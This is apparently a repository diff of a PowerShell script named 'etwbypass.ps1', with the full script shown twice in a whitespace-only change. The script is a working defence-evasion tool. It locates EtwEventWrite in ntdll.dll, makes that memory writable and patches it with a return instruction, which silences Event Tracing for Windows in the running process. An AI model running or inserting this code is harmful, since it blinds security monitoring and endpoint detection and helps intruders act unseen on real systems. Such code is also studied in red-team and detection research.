davehardy20 · March 6, 2024 11:10
diff --git a/etwbypass.ps1 b/etwbypass.ps1
 # Setup native functions so they can be called through c#
 $win32 = @"
 using System.Runtime.InteropServices;
 using System;

 public class Win32 {


 [DllImport("kernel32")]
 public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);


 [DllImport("kernel32")]
 public static extern IntPtr LoadLibrary(string name);


 [DllImport("kernel32")]
 public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);


 }
 "@


 # Add the type so the c# functions can be called through PowerShell
 Add-Type $win32


 # Get a pointer to the memory address where the ntdll.dll EtwEventWrite function is loaded in the current process
 # https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getprocaddress
 $address = [Win32]::GetProcAddress([Win32]::LoadLibrary("ntdll.dll"), "EtwEventWrite")


 # Create a byte array that will be used to overwrite (hotpatch) the dll in memory.
 $oldProtect = 0
 $b2 = 0
 $hook = New-Object Byte[] 4
 $hook[0] = 0xc2; 
 $hook[1] = 0x14; 
 $hook[2] = 0x00; 
 $hook[3] = 0x00; 


 # Set the memory page as writable - PAGE_EXECUTE_READWRITE
 # https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants
 # 0x01 PAGE_NOACCESS
 # 0x02 PAGE_READONLY
 # 0x10 PAGE_EXECUTE
 # 0x20 PAGE_EXECUTE_READ
 # 0x40 PAGE_EXECUTE_READWRITE
 # 0x80 PAGE_EXECUTE_WRITECOPY
 [Win32]::VirtualProtect($address, [UInt32]$hook.Length, 0x40, [Ref]$oldProtect)


 # Start and the ntdll.dll prt location and overwrite memory with the 4 bytes array to block etw
 [System.Runtime.InteropServices.Marshal]::Copy($hook, 0, $address, [UInt32]$hook.Length)


 # Restore setting
 [Win32]::VirtualProtect($address, [UInt32]$hook.Length, $oldProtect, [Ref]$b2)
	# Setup native functions so they can be called through c#
	$win32 = @"
	using System.Runtime.InteropServices;
	using System;

	public class Win32 {


	[DllImport("kernel32")]
	public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);


	[DllImport("kernel32")]
	public static extern IntPtr LoadLibrary(string name);


	[DllImport("kernel32")]
	public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);


	}
	"@


	# Add the type so the c# functions can be called through PowerShell
	Add-Type $win32


	# Get a pointer to the memory address where the ntdll.dll EtwEventWrite function is loaded in the current process
	# https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getprocaddress
	$address = [Win32]::GetProcAddress([Win32]::LoadLibrary("ntdll.dll"), "EtwEventWrite")


	# Create a byte array that will be used to overwrite (hotpatch) the dll in memory.
	$oldProtect = 0
	$b2 = 0
	$hook = New-Object Byte[] 4
	$hook[0] = 0xc2;
	$hook[1] = 0x14;
	$hook[2] = 0x00;
	$hook[3] = 0x00;


	# Set the memory page as writable - PAGE_EXECUTE_READWRITE
	# https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants
	# 0x01 PAGE_NOACCESS
	# 0x02 PAGE_READONLY
	# 0x10 PAGE_EXECUTE
	# 0x20 PAGE_EXECUTE_READ
	# 0x40 PAGE_EXECUTE_READWRITE
	# 0x80 PAGE_EXECUTE_WRITECOPY
	[Win32]::VirtualProtect($address, [UInt32]$hook.Length, 0x40, [Ref]$oldProtect)


	# Start and the ntdll.dll prt location and overwrite memory with the 4 bytes array to block etw
	[System.Runtime.InteropServices.Marshal]::Copy($hook, 0, $address, [UInt32]$hook.Length)


	# Restore setting
	[Win32]::VirtualProtect($address, [UInt32]$hook.Length, $oldProtect, [Ref]$b2)